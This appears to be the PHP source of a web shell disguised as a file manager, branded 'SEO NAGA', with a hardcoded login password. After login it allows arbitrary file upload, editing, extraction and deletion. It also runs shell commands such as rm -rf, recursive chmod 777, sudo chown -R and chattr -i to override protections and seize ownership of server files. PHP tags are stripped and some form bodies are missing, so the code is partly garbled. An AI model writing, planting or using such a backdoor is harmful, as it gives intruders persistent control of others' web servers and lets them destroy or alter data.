session_start();

// ========== KONFIGURASI ==========
$correct_password = "mumet69"; // Password default

// ========== FUNGSI UTAMA ==========
function getScriptContent() {
return file_get_contents(__FILE__);
}

function saveScriptContent($content) {
file_put_contents(__FILE__, $content);
}

function isLoggedIn() {
return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}

function handleLogin($password) {
global $correct_password;
if ($password === $correct_password) {
$_SESSION['loggedin'] = true;
return true;
}
return false;
}

function changePassword($new_password) {
global $correct_password;
$script_content = getScriptContent();
$new_script_content = preg_replace(
'/(\$correct_password\s*=\s*\")[^\"]+(\")/',
'$1' . addslashes($new_password) . '$2',
$script_content
);
saveScriptContent($new_script_content);
$correct_password = $new_password;
}

function createFolder($folder_name, $path) {
$target_dir = rtrim($path, '/') . '/' . $folder_name;
if (!is_dir($target_dir)) {
return mkdir($target_dir, 0755, true);
}
return false;
}

function uploadFile($file, $path) {
$target_file = rtrim($path, '/') . '/' . basename($file["name"]);
return move_uploaded_file($file["tmp_name"], $target_file);
}

// ========== FUNGSI DELETE YANG DIPERBAIKI ==========
function forceDeleteFile($file_path) {
if (!file_exists($file_path)) {
return array('success' => false, 'message' => 'File does not exist');
}

// Cek apakah file bisa dihapus dengan normal
if (is_writable($file_path)) {
if (unlink($file_path)) {
return array('success' => true, 'message' => 'File deleted successfully');
}
}

// Coba berbagai metode jika gagal
$methods = array();

// Method 1: Coba ubah permissions dulu
if (chmod($file_path, 0777)) {
if (unlink($file_path)) {
return array('success' => true, 'message' => 'File deleted after changing permissions to 0777');
}
$methods[] = "Changed permissions but still cannot delete";
} else {
$methods[] = "Cannot change permissions";
}

// Method 2: Coba gunakan system command (Linux/Unix)
if (function_exists('shell_exec') && is_callable('shell_exec')) {
$output = shell_exec("rm -f " . escapeshellarg($file_path) . " 2>&1");
if (!file_exists($file_path)) {
return array('success' => true, 'message' => 'File deleted using system command');
}
$methods[] = "System command failed";
}

// Method 3: Untuk Windows
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$output = shell_exec("del /F " . escapeshellarg($file_path) . " 2>&1");
if (!file_exists($file_path)) {
return array('success' => true, 'message' => 'File deleted using Windows command');
}
$methods[] = "Windows command failed";
}

return array('success' => false, 'message' => 'Cannot delete file. Attempted methods: ' . implode(', ', $methods));
}

function forceDeleteDir($dir_path) {
if (!is_dir($dir_path)) {
return array('success' => false, 'message' => 'Not a directory');
}

// Coba hapus normal dulu
if (is_writable($dir_path)) {
$items = array_diff(scandir($dir_path), ['.', '..']);
foreach ($items as $item) {
$full_path = "$dir_path/$item";
if (is_dir($full_path)) {
$result = forceDeleteDir($full_path);
if (!$result['success']) return $result;
} else {
$result = forceDeleteFile($full_path);
if (!$result['success']) return $result;
}
}
if (rmdir($dir_path)) {
return array('success' => true, 'message' => 'Directory deleted successfully');
}
}

// Jika gagal, coba ubah permissions recursive
if (function_exists('shell_exec') && is_callable('shell_exec')) {
// Linux/Unix: recursive chmod lalu delete
shell_exec("chmod -R 777 " . escapeshellarg($dir_path) . " 2>&1");
$output = shell_exec("rm -rf " . escapeshellarg($dir_path) . " 2>&1");

if (!is_dir($dir_path)) {
return array('success' => true, 'message' => 'Directory deleted using force method');
}
}

return array('success' => false, 'message' => 'Cannot delete directory');
}

// ========== FUNGSI CHMOD YANG DIPERBAIKI ==========
function forceChangePermissions($path, $permissions) {
if (!file_exists($path)) {
return array('success' => false, 'message' => 'File/directory does not exist');
}

// Coba chmod normal
if (chmod($path, octdec($permissions))) {
return array('success' => true, 'message' => 'Permissions changed to ' . $permissions);
}

// Jika gagal, coba sebagai super user (jika memungkinkan)
if (function_exists('shell_exec') && is_callable('shell_exec')) {
$output = shell_exec("chmod " . $permissions . " " . escapeshellarg($path) . " 2>&1");

// Cek apakah berhasil
clearstatcache(true, $path);
$new_perm = substr(sprintf('%o', fileperms($path)), -4);
if ($new_perm == $permissions) {
return array('success' => true, 'message' => 'Permissions changed using system command');
}

// Coba dengan sudo jika tersedia
$output = shell_exec("sudo chmod " . $permissions . " " . escapeshellarg($path) . " 2>&1");
clearstatcache(true, $path);
$new_perm = substr(sprintf('%o', fileperms($path)), -4);
if ($new_perm == $permissions) {
return array('success' => true, 'message' => 'Permissions changed using sudo');
}

// Untuk file dengan immutable flag (Linux)
$output = shell_exec("lsattr " . escapeshellarg($path) . " 2>&1");
if (strpos($output, "i----") !== false) {
// File memiliki immutable flag
shell_exec("chattr -i " . escapeshellarg($path) . " 2>&1");
if (chmod($path, octdec($permissions))) {
return array('success' => true, 'message' => 'Immutable flag removed and permissions changed');
}
}
}

return array('success' => false, 'message' => 'Cannot change permissions. File may be owned by different user or system protected.');
}

// ========== FUNGSI BARU: TAKE OWNERSHIP ==========
function getWebServerUser() {
// Daftar kemungkinan user web server
$possible_users = array('www-data', 'apache', 'nginx', 'httpd', 'nobody', '_www');

// Coba dapatkan dari posix
if (function_exists('posix_geteuid')) {
$uid = posix_geteuid();
if ($uid !== false) {
$user_info = posix_getpwuid($uid);
if ($user_info && isset($user_info['name'])) {
return $user_info['name'];
}
}
}

// Coba cek dari process
if (function_exists('shell_exec') && is_callable('shell_exec')) {
// Cari process web server
$output = shell_exec("ps aux | grep -E '(apache|httpd|nginx|php-fpm|php-cgi)' | grep -v grep | head -1 2>/dev/null");
if ($output && preg_match('/^(\S+)\s+/', $output, $matches)) {
return $matches[1];
}

// Cari process PHP
$output = shell_exec("ps aux | grep php | grep -v grep | head -1 2>/dev/null");
if ($output && preg_match('/^(\S+)\s+/', $output, $matches)) {
return $matches[1];
}
}

// Coba dari environment variables
if (isset($_SERVER['USER'])) {
return $_SERVER['USER'];
}

if (isset($_SERVER['USERNAME'])) {
return $_SERVER['USERNAME'];
}

// Default untuk kebanyakan sistem Linux
return 'www-data';
}

function changeFileOwnership($path, $user = null, $group = null) {
if (!file_exists($path)) {
return array('success' => false, 'message' => 'File/directory does not exist');
}

// Tentukan user dan group
if ($user === null) {
$user = getWebServerUser();
}

if ($group === null) {
$group = $user; // Default group sama dengan user
}

// Cek ownership saat ini
$current_owner = getFileOwnerInfo($path);

// Jika sudah dimiliki oleh user yang diinginkan
if (isset($current_owner['owner']) && $current_owner['owner'] == $user) {
return array('success' => true, 'message' => 'File already owned by ' . $user);
}

// Method 1: Coba chown normal (jarang berhasil untuk root files)
if (chown($path, $user) && chgrp($path, $group)) {
return array('success' => true, 'message' => 'Ownership changed to ' . $user . ':' . $group);
}

// Method 2: Gunakan shell command
if (function_exists('shell_exec') && is_callable('shell_exec')) {
// Coba tanpa sudo dulu
$output = shell_exec("chown " . escapeshellarg($user) . ":" . escapeshellarg($group) . " " . escapeshellarg($path) . " 2>&1");

// Cek apakah berhasil
clearstatcache(true, $path);
$new_owner = getFileOwnerInfo($path);

if (isset($new_owner['owner']) && $new_owner['owner'] == $user) {
return array('success' => true, 'message' => 'Ownership changed to ' . $user . ':' . $group);
}

// Coba dengan sudo
$output = shell_exec("sudo chown " . escapeshellarg($user) . ":" . escapeshellarg($group) . " " . escapeshellarg($path) . " 2>&1");

// Cek lagi
clearstatcache(true, $path);
$new_owner = getFileOwnerInfo($path);

if (isset($new_owner['owner']) && $new_owner['owner'] == $user) {
return array('success' => true, 'message' => 'Ownership changed to ' . $user . ':' . $group . ' (using sudo)');
}

// Coba recursive jika directory
if (is_dir($path)) {
$output = shell_exec("sudo chown -R " . escapeshellarg($user) . ":" . escapeshellarg($group) . " " . escapeshellarg($path) . " 2>&1");

clearstatcache(true, $path);
$new_owner = getFileOwnerInfo($path);

if (isset($new_owner['owner']) && $new_owner['owner'] == $user) {
return array('success' => true, 'message' => 'Ownership changed recursively to ' . $user . ':' . $group . ' (using sudo)');
}
}

return array('success' => false, 'message' => 'Cannot change ownership. Error: ' . $output);
}

return array('success' => false, 'message' => 'Cannot change ownership. Shell commands not available.');
}

function getFileOwnerInfo($path) {
$info = array();

if (function_exists('posix_getpwuid') && function_exists('fileowner')) {
$owner_id = fileowner($path);
$group_id = filegroup($path);

$owner_info = posix_getpwuid($owner_id);
$group_info = posix_getgrgid($group_id);

if ($owner_info) {
$info['owner'] = $owner_info['name'];
$info['uid'] = $owner_info['uid'];
} else {
$info['owner'] = $owner_id;
$info['uid'] = $owner_id;
}

if ($group_info) {
$info['group'] = $group_info['name'];
$info['gid'] = $group_info['gid'];
} else {
$info['group'] = $group_id;
$info['gid'] = $group_id;
}
} else {
// Fallback jika posix tidak tersedia
$info['owner'] = 'Unknown';
$info['group'] = 'Unknown';
$info['uid'] = 0;
$info['gid'] = 0;
}

$info['is_writable'] = is_writable($path);
$info['is_readable'] = is_readable($path);
$info['is_executable'] = is_executable($path);

return $info;
}

function createFile($file_name, $path) {
$target_file = rtrim($path, '/') . '/' . $file_name;
if (!file_exists($target_file)) {
return touch($target_file);
}
return false;
}

// ========== FUNGSI LAIN ==========
function getCurrentPermissions($path) {
if (file_exists($path)) {
return substr(sprintf('%o', fileperms($path)), -4);
}
return false;
}

function unzipFile($zip_path, $extract_path) {
if (!class_exists('ZipArchive')) {
return array('success' => false, 'message' => 'ZipArchive class not available');
}

if (!is_file($zip_path)) {
return array('success' => false, 'message' => 'File not found');
}

$zip = new ZipArchive();
$result = $zip->open($zip_path);

if ($result !== TRUE) {
return array('success' => false, 'message' => "Failed to open zip file. Error code: $result");
}

if (!is_dir($extract_path) && !mkdir($extract_path, 0755, true)) {
$zip->close();
return array('success' => false, 'message' => 'Failed to create extraction directory');
}

if (!$zip->extractTo($extract_path)) {
$zip->close();
return array('success' => false, 'message' => 'Failed to extract zip file');
}

$zip->close();
return array('success' => true, 'message' => 'File successfully extracted');
}

// ========== HANDLING FORM ==========

// Login
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password']) && !isLoggedIn()) {
if (handleLogin($_POST['password'])) {
header('Location: ' . $_SERVER['PHP_SELF']);
exit();
} else {
$login_error = "Password salah!";
}
}

// Ganti Password
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_password']) && isLoggedIn()) {
changePassword($_POST['new_password']);
$password_change_success = "Password berhasil diganti!";
}

// Buat Folder
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['create_folder']) && isLoggedIn()) {
$current_path = $_POST['current_path'];
if (createFolder($_POST['folder_name'], $current_path)) {
$folder_create_success = "Folder berhasil dibuat.";
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
} else {
$folder_create_error = "Gagal membuat folder.";
}
}

// Upload File
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit']) && isLoggedIn()) {
$current_path = $_POST['current_path'];
if (uploadFile($_FILES["file"], $current_path)) {
$file_upload_success = "File berhasil diunggah.";
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
} else {
$file_upload_error = "Gagal mengunggah file.";
}
}

// Hapus File/Folder
if (isset($_GET['delete']) && isLoggedIn()) {
$path_to_delete = $_GET['delete'];
$current_path = dirname($path_to_delete);

if (is_dir($path_to_delete)) {
$result = forceDeleteDir($path_to_delete);
} else {
$result = forceDeleteFile($path_to_delete);
}

if ($result['success']) {
$delete_success = $result['message'];
} else {
$delete_error = $result['message'];
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Force Delete Khusus
if (isset($_GET['force_delete']) && isLoggedIn()) {
$path_to_delete = $_GET['force_delete'];
$current_path = dirname($path_to_delete);

// Gunakan metode paling agresif
if (function_exists('shell_exec') && is_callable('shell_exec')) {
if (is_dir($path_to_delete)) {
$output = shell_exec("rm -rf " . escapeshellarg($path_to_delete) . " 2>&1");
$result = array('success' => !is_dir($path_to_delete), 'message' => 'Force directory deletion attempted');
} else {
$output = shell_exec("rm -f " . escapeshellarg($path_to_delete) . " 2>&1");
$result = array('success' => !file_exists($path_to_delete), 'message' => 'Force file deletion attempted');
}
} else {
$result = array('success' => false, 'message' => 'Shell execution not available');
}

if ($result['success']) {
$delete_success = "File/directory forcibly deleted";
} else {
$delete_error = "Cannot force delete. File may be system protected.";
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Buat File
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['create_file']) && isLoggedIn()) {
$current_path = $_POST['current_path'];
if (createFile($_POST['file_name'], $current_path)) {
$file_create_success = "File berhasil dibuat.";
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
} else {
$file_create_error = "Gagal membuat file.";
}
}

// Rename File/Folder
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_name']) && isset($_POST['old_name']) && isLoggedIn()) {
$old_name = $_POST['old_name'];
$new_name = $_POST['new_name'];
$current_path = dirname($old_name);
if (rename($old_name, dirname($old_name) . '/' . $new_name)) {
$rename_success = "Berhasil mengubah nama.";
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
} else {
$rename_error = "Gagal mengubah nama.";
}
}

// Edit File
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['file_content']) && isset($_POST['file_to_edit']) && isLoggedIn()) {
$file_to_edit = $_POST['file_to_edit'];
$current_path = dirname($file_to_edit);
if (file_put_contents($file_to_edit, $_POST['file_content']) !== false) {
$file_edit_success = "Berhasil menyimpan perubahan.";
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
} else {
$file_edit_error = "Gagal menyimpan perubahan.";
}
}

// Change Permissions (CHMOD)
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_permissions']) && isset($_POST['chmod_path']) && isLoggedIn()) {
$chmod_path = $_POST['chmod_path'];
$permissions = $_POST['chmod_permissions'];
$current_path = dirname($chmod_path);

$result = forceChangePermissions($chmod_path, $permissions);

if ($result['success']) {
$chmod_success = $result['message'];
} else {
$chmod_error = $result['message'];
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// ========== TAKE OWNERSHIP (FITUR BARU) ==========
if (isset($_GET['take_ownership']) && isLoggedIn()) {
$target_path = $_GET['take_ownership'];
$current_path = dirname($target_path);

$result = changeFileOwnership($target_path);

if ($result['success']) {
$ownership_success = $result['message'];
} else {
$ownership_error = $result['message'];
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Take Ownership Recursive (untuk directory)
if (isset($_GET['take_ownership_recursive']) && isLoggedIn()) {
$target_path = $_GET['take_ownership_recursive'];
$current_path = dirname($target_path);

if (!is_dir($target_path)) {
$ownership_error = "Target is not a directory";
} else {
if (function_exists('shell_exec') && is_callable('shell_exec')) {
$user = getWebServerUser();
$output = shell_exec("sudo chown -R " . escapeshellarg($user) . ":" . escapeshellarg($user) . " " . escapeshellarg($target_path) . " 2>&1");

if ($output === null || trim($output) === '') {
$ownership_success = "Ownership changed recursively to " . $user;
} else {
$ownership_error = "Error: " . $output;
}
} else {
$ownership_error = "Shell commands not available";
}
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Unzip File
if (isset($_GET['unzip']) && isLoggedIn()) {
$zip_path = $_GET['unzip'];
$current_path = dirname($zip_path);

$result = unzipFile($zip_path, $current_path);

if ($result['success']) {
$unzip_success = $result['message'];
} else {
$unzip_error = $result['message'];
}
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Fix Permissions Recursive
if (isset($_GET['fix_permissions']) && isLoggedIn()) {
$target_path = $_GET['fix_permissions'];
$current_path = dirname($target_path);

if (function_exists('shell_exec') && is_callable('shell_exec')) {
if (is_dir($target_path)) {
$output = shell_exec("chmod -R 755 " . escapeshellarg($target_path) . " 2>&1");
$fix_result = "Permissions fixed recursively for directory";
} else {
$output = shell_exec("chmod 644 " . escapeshellarg($target_path) . " 2>&1");
$fix_result = "Permissions fixed for file";
}
$fix_success = $fix_result;
} else {
$fix_error = "Cannot fix permissions: shell_exec not available";
}

header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path));
exit();
}

// Logout
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit();
}

// ========== TAMPILAN FORM ==========

// Halaman Login (sama seperti sebelumnya, supaya singkat saya skip)
// ... [kode login sama] ...

if (!isLoggedIn()) {

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
File Manager - Login <title>File Manager - Login</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background: #0a0a0a; color: #ffff; font-family: 'Consolas', 'Monaco', monospace;
line-height: 1.6; min-height: 100vh; display: flex; justify-content: center; align-items: center;
}
.login-container { width: 100%; max-width: 400px; padding: 20px; }
.login-box {
background: #111; border: 1px solid #ffff; border-radius: 5px; padding: 30px;
box-shadow: 0 0 15px rgba(0, 255, 0, 0.2);
}
.login-header { text-align: center; margin-bottom: 30px; padding-bottom: 20px; border-bottom: 1px solid #ffff; }
.login-header h1 { font-size: 24px; color: #ffff; text-shadow: 0 0 10px rgba(0, 255, 0, 0.5); }
.login-header p { font-size: 14px; color: #8f8; margin-top: 5px; }
.form-group { margin-bottom: 20px; }
.form-group label { display: block; margin-bottom: 8px; color: #8f8; font-size: 14px; }
.form-control {
width: 100%; padding: 12px; background: #000; border: 1px solid #333; color: #ffff;
font-family: 'Consolas', 'Monaco', monospace; font-size: 16px; border-radius: 3px; transition: all 0.3s;
}
.form-control:focus { outline: none; border-color: #ffff; box-shadow: 0 0 10px rgba(0, 255, 0, 0.3); }
.btn {
width: 100%; padding: 12px; background: #000; color: #ffff; border: 1px solid #ffff;
font-family: 'Consolas', 'Monaco', monospace; font-size: 16px; border-radius: 3px; cursor: pointer;
transition: all 0.3s; text-transform: uppercase; letter-spacing: 1px;
}
.btn:hover { background: #ffff; color: #000; box-shadow: 0 0 15px rgba(0, 255, 0, 0.5); }
.alert { padding: 10px; margin-bottom: 20px; border-radius: 3px; font-size: 14px; }
.alert-error { background: rgba(255, 0, 0, 0.1); border: 1px solid rgba(255, 0, 0, 0.3); color: #f88; }
.alert-success { background: rgba(0, 255, 0, 0.1); border: 1px solid rgba(0, 255, 0, 0.3); color: #8f8; }
.footer-note { text-align: center; margin-top: 20px; font-size: 12px; color: #666; }
</style>

<div class="login-container">
<div class="login-box">
<div class="login-header">

SEO NAGA

<p>Terminal 777</p>
</div>
if (isset($login_error)):
<div class="alert alert-error"> echo htmlspecialchars($login_error); </div>
endif;
if (isset($password_change_success)):
<div class="alert alert-success"> echo htmlspecialchars($password_change_success); </div>
endif;

<div class="footer-note">seo naga only</div>
</div>
</div>

exit();
}

// Form Ganti Password
if (isset($_GET['change_password']) && isLoggedIn()) {

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Change Password <title>Change Password</title>
<style>
body { background: #0a0a0a; color: #ffff; font-family: 'Consolas', 'Monaco', monospace; padding: 20px; }
.container { max-width: 500px; margin: 50px auto; background: #111; padding: 30px; border: 1px solid #ffff; border-radius: 5px; }
h2 { margin-bottom: 20px; padding-bottom: 10px; border-bottom: 1px solid #ffff; }
input[type="password"] { width: 100%; padding: 10px; margin: 10px 0; background: #000; border: 1px solid #333; color: #ffff; }
input[type="submit"] { background: #000; color: #ffff; border: 1px solid #ffff; padding: 10px 20px; cursor: pointer; }
.message { padding: 10px; margin: 10px 0; border-radius: 3px; }
.success { background: rgba(0, 255, 0, 0.1); border: 1px solid rgba(0, 255, 0, 0.3); }
</style>

<div class="container">

Change Password

if (isset($password_change_success)):
<div class="message success"> echo htmlspecialchars($password_change_success); </div>
endif;

<p><a href=" echo $_SERVER['PHP_SELF']; ">← Back to File Manager</a></p>
</div>

exit();
}

// Form Simple
$simple_forms = ['rename', 'create_folder', 'upload_file', 'create_file', 'edit_file', 'chmod'];
foreach ($simple_forms as $form_type) {
if (isset($_GET[$form_type]) && isLoggedIn()) {
$title = str_replace('_', ' ', ucfirst($form_type));
$current_path = $_GET['path'] ?? getcwd();

if ($form_type === 'edit_file') {
$file_to_edit = $_GET['edit_file'];
if (is_file($file_to_edit)) {
$file_content = htmlspecialchars(file_get_contents($file_to_edit));
} else {
header('Location: ' . $_SERVER['PHP_SELF']);
exit();
}
}

if ($form_type === 'chmod') {
$chmod_path = $_GET['chmod'];
if (!file_exists($chmod_path)) {
header('Location: ' . $_SERVER['PHP_SELF']);
exit();
}
$current_permissions = getCurrentPermissions($chmod_path);
$owner_info = getFileOwnerInfo($chmod_path);
}

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php echo $title; ?> <title> echo $title; </title>
<style>
body { background: #0a0a0a; color: #ffff; font-family: 'Consolas', 'Monaco', monospace; padding: 20px; }
.container { max-width: 800px; margin: 20px auto; background: #111; padding: 20px; border: 1px solid #ffff; border-radius: 5px; }
h2 { margin-bottom: 20px; padding-bottom: 10px; border-bottom: 1px solid #ffff; color: #ffff; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; color: #8f8; }
input[type="text"], input[type="file"], textarea, select {
width: 100%; padding: 10px; background: #000; border: 1px solid #333; color: #ffff;
font-family: 'Consolas', 'Monaco', monospace;
}
textarea { min-height: 300px; resize: vertical; }
.file-info { background: #1a1a1a; padding: 15px; margin: 15px 0; border-radius: 3px; border: 1px solid #333; }
.file-info h4 { margin-bottom: 10px; color: #ffff; }
.file-info ul { margin-left: 20px; }
.file-info li { margin-bottom: 5px; color: #8f8; }
.warning-box { background: rgba(255, 165, 0, 0.1); border: 1px solid rgba(255, 165, 0, 0.3); padding: 10px; margin: 10px 0; border-radius: 3px; color: #ffa500; }
.danger-box { background: rgba(255, 0, 0, 0.1); border: 1px solid rgba(255, 0, 0, 0.3); padding: 10px; margin: 10px 0; border-radius: 3px; color: #f88; }
.btn-group { margin-top: 20px; display: flex; gap: 10px; flex-wrap: wrap; }
.btn { padding: 10px 20px; background: #000; color: #ffff; border: 1px solid #ffff; cursor: pointer; text-decoration: none; display: inline-block; }
.btn:hover { background: #ffff; color: #000; }
.btn-warning { border-color: #ff8c00; color: #ffa500; }
.btn-warning:hover { background: #ff8c00; color: #000; }
.btn-primary { flex: 1; }
</style>

<div class="container">

echo $title;

if ($form_type === 'chmod'):
<div class="file-info">
<h4>File Information:</h4>
<ul>
<li><strong>Path:</strong> echo htmlspecialchars($chmod_path); </li>
<li><strong>Type:</strong> echo is_dir($chmod_path) ? 'Directory' : 'File'; </li>
<li><strong>Current Permissions:</strong> echo $current_permissions; </li>
<li><strong>Owner:</strong> echo $owner_info['owner']; (UID: echo $owner_info['uid']; )</li>
<li><strong>Group:</strong> echo $owner_info['group']; (GID: echo $owner_info['gid']; )</li>
<li><strong>Web Server User:</strong> echo getWebServerUser(); </li>
</ul>
</div>
endif;

if ($form_type === 'rename'):

elseif ($form_type === 'create_folder'):

elseif ($form_type === 'create_file'):

elseif ($form_type === 'upload_file'):

elseif ($form_type === 'edit_file'):

<textarea name="file_content" autofocus> echo $file_content; </textarea>

elseif ($form_type === 'chmod'):

<div class="form-group">
<label for="chmod_permissions">New Permissions (Octal):</label>
<select name="chmod_permissions" id="chmod_permissions" required autofocus>
<option value="">-- Select Permissions --</option>
<option value="0777">0777 (rwxrwxrwx) - Full Access</option>
<option value="0755">0755 (rwxr-xr-x) - Owner full, others read/execute</option>
<option value="0744">0744 (rwxr--r--) - Owner full, others read only</option>
<option value="0644">0644 (rw-r--r--) - Owner read/write, others read only</option>
<option value="0600">0600 (rw-------) - Owner read/write only</option>
<option value="0700">0700 (rwx------) - Owner full access only</option>
</select>
</div>

endif;

<div class="btn-group">
<button type="submit"
name=" echo $form_type === 'upload_file' ? 'submit' : $form_type; "
class="btn btn-primary">
echo $form_type === 'edit_file' ? 'Save Changes' :
($form_type === 'upload_file' ? 'Upload' : 'Change Permissions');
</button>
<a href=" echo $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path); " class="btn">
Cancel
</a>
</div>

</div>

exit();
}
}

// ========== TAMPILAN UTAMA FILE MANAGER ==========
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
if (!is_dir($path)) {
$path = getcwd();
}
chdir($path);
$real_path = realpath($path);
$items = array_diff(scandir($path), ['.', '..']);

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
File Manager - <?php echo basename($real_path); ?> <title>File Manager - echo basename($real_path); </title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }

body {
background: #0a0a0a; color: #ffff; font-family: 'Consolas', 'Monaco', monospace;
line-height: 1.6; padding: 20px; min-height: 100vh;
}

.container { max-width: 1400px; margin: 0 auto; }

/* Header */
.header {
background: #111; border: 1px solid #ffff; border-radius: 5px; padding: 20px;
margin-bottom: 20px; display: flex; justify-content: space-between; align-items: center;
flex-wrap: wrap; gap: 10px;
}

.header h1 { color: #ffff; font-size: 24px; text-shadow: 0 0 10px rgba(0, 255, 0, 0.5); }

.header-actions { display: flex; gap: 10px; flex-wrap: wrap; }

/* Toolbar */
.toolbar {
background: #111; border: 1px solid #ffff; border-radius: 5px; padding: 15px;
margin-bottom: 20px; display: flex; gap: 10px; flex-wrap: wrap;
}

/* Breadcrumb */
.breadcrumb {
background: #111; border: 1px solid #ffff; border-radius: 5px; padding: 15px;
margin-bottom: 20px; font-size: 14px;
}

.breadcrumb a { color: #8f8; text-decoration: none; }
.breadcrumb a:hover { color: #ffff; text-decoration: underline; }

/* File List */
.file-list {
background: #111; border: 1px solid #ffff; border-radius: 5px;
overflow: hidden; margin-bottom: 20px;
}

.file-list-header {
background: #1a1a1a; padding: 15px; border-bottom: 1px solid #ffff;
display: grid; grid-template-columns: 40px 1fr 120px 250px;
gap: 15px; font-weight: bold; color: #8f8;
}

.file-item {
padding: 12px 15px; border-bottom: 1px solid #222;
display: grid; grid-template-columns: 40px 1fr 120px 250px;
gap: 15px; align-items: center; transition: background 0.3s;
}

.file-item.root-owned { background: rgba(255, 0, 0, 0.05); border-left: 3px solid #f00; }
.file-item:hover { background: #1a1a1a; }
.file-item:last-child { border-bottom: none; }

.file-icon { text-align: center; font-weight: bold; }
.file-name a { color: #ffff; text-decoration: none; }
.file-name a:hover { text-decoration: underline; }

.file-permissions { font-size: 12px; color: #8f8; font-family: monospace; }
.file-actions { display: flex; gap: 8px; justify-content: flex-end; flex-wrap: wrap; }

/* Buttons */
.btn {
display: inline-block; padding: 6px 12px; background: #000; color: #ffff;
border: 1px solid #ffff; border-radius: 3px; text-decoration: none; font-size: 12px;
cursor: pointer; transition: all 0.3s; font-family: 'Consolas', 'Monaco', monospace;
}

.btn:hover { background: #ffff; color: #000; box-shadow: 0 0 10px rgba(0, 255, 0, 0.5); }

.btn-danger { border-color: #f00; color: #f88; }
.btn-danger:hover { background: #f00; color: #000; }

.btn-warning { border-color: #ff8c00; color: #ffa500; }
.btn-warning:hover { background: #ff8c00; color: #000; }

.btn-success { border-color: #0f0; color: #8f8; }
.btn-success:hover { background: #0f0; color: #000; }

.btn-owner { border-color: #8a2be2; color: #d8b; }
.btn-owner:hover { background: #8a2be2; color: #000; }

.btn-sm { padding: 4px 8px; font-size: 11px; }

/* Messages */
.message { padding: 15px; margin-bottom: 20px; border-radius: 5px; border: 1px solid; }
.message-success { background: rgba(0, 255, 0, 0.1); border-color: rgba(0, 255, 0, 0.3); color: #8f8; }
.message-error { background: rgba(255, 0, 0, 0.1); border-color: rgba(255, 0, 0, 0.3); color: #f88; }
.message-info { background: rgba(0, 191, 255, 0.1); border-color: rgba(0, 191, 255, 0.3); color: #8cf; }

/* Stats */
.stats {
background: #111; border: 1px solid #ffff; border-radius: 5px;
padding: 15px; margin-top: 20px; font-size: 14px; color: #8f8;
}

/* Permission Badge */
.perm-badge {
display: inline-block; padding: 2px 6px; border-radius: 3px;
font-size: 11px; font-family: monospace; margin-right: 5px;
}

.perm-777 { background: rgba(255, 0, 0, 0.2); color: #f88; border: 1px solid rgba(255, 0, 0, 0.5); }
.perm-755 { background: rgba(255, 165, 0, 0.2); color: #ffa500; border: 1px solid rgba(255, 165, 0, 0.5); }
.perm-644 { background: rgba(0, 255, 0, 0.2); color: #8f8; border: 1px solid rgba(0, 255, 0, 0.5); }
.perm-600 { background: rgba(128, 128, 128, 0.2); color: #ccc; border: 1px solid rgba(128, 128, 128, 0.5); }
.perm-root { background: rgba(255, 0, 0, 0.3); color: #f88; border: 1px solid #f00; animation: pulse 2s infinite; }

@keyframes pulse { 0% { opacity: 1; } 50% { opacity: 0.7; } 100% { opacity: 1; } }

.root-warning { color: #f88; font-size: 11px; margin-top: 3px; }
.server-info { color: #8cf; font-size: 11px; margin-top: 3px; }

/* Responsive */
@media (max-width: 992px) {
.file-list-header, .file-item { grid-template-columns: 30px 1fr 100px; }
.file-actions { grid-column: 3; }
}

@media (max-width: 768px) {
.file-list-header, .file-item { grid-template-columns: 30px 1fr; }
.file-permissions, .file-actions { grid-column: 2; justify-content: flex-start; margin-top: 5px; }
}
</style>

<div class="container">

<div class="header">

FILE MANAGER SEO NAGA - OWNERSHIP EDITION

<div class="header-actions">
<a href="?logout" class="btn">Logout</a>
<a href="?change_password" class="btn">Change Password</a>
</div>
</div>


<div class="message message-info">
<strong>System Information:</strong>
Web Server User: <strong> echo getWebServerUser(); </strong> |
PHP Version: echo phpversion(); |
Server: echo $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown';
if (!function_exists('shell_exec')):
